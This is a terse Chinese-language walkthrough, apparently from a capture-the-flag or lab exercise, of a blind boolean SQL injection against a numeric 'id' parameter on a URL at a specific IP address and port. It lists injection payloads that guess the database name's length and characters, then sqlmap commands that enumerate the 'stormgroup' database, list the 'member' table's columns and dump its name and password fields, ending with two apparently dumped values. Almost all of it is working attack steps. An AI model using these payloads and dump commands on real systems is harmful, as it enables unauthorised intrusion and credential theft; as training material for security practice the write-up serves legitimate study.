and 1=2空白 1=1正常
http://219.153.49.228:42670/new_list.php?id=1’and 1=1–+空白
所以说是数字型
然后判断数据库名字的长度,id=1 and length(database())=1,内容空白。一直试,试到长度为10,正常了
判断数据库的名字,输入id=1 and substr(database(),1,1)=‘a’ --+,轮流尝试,最后第一位是s
然后我用sqlmap跑出来全称 、 --current-db
爆表
-D stormgroup --tables
爆列-D stormgroup -T member --columns
爆破数据
sqlmap -u “http://<爆破的链接>” -D stormgroup -T member -C name,password --dump ///-C 是要爆破的列,–dump是爆破
528469
492466
ok了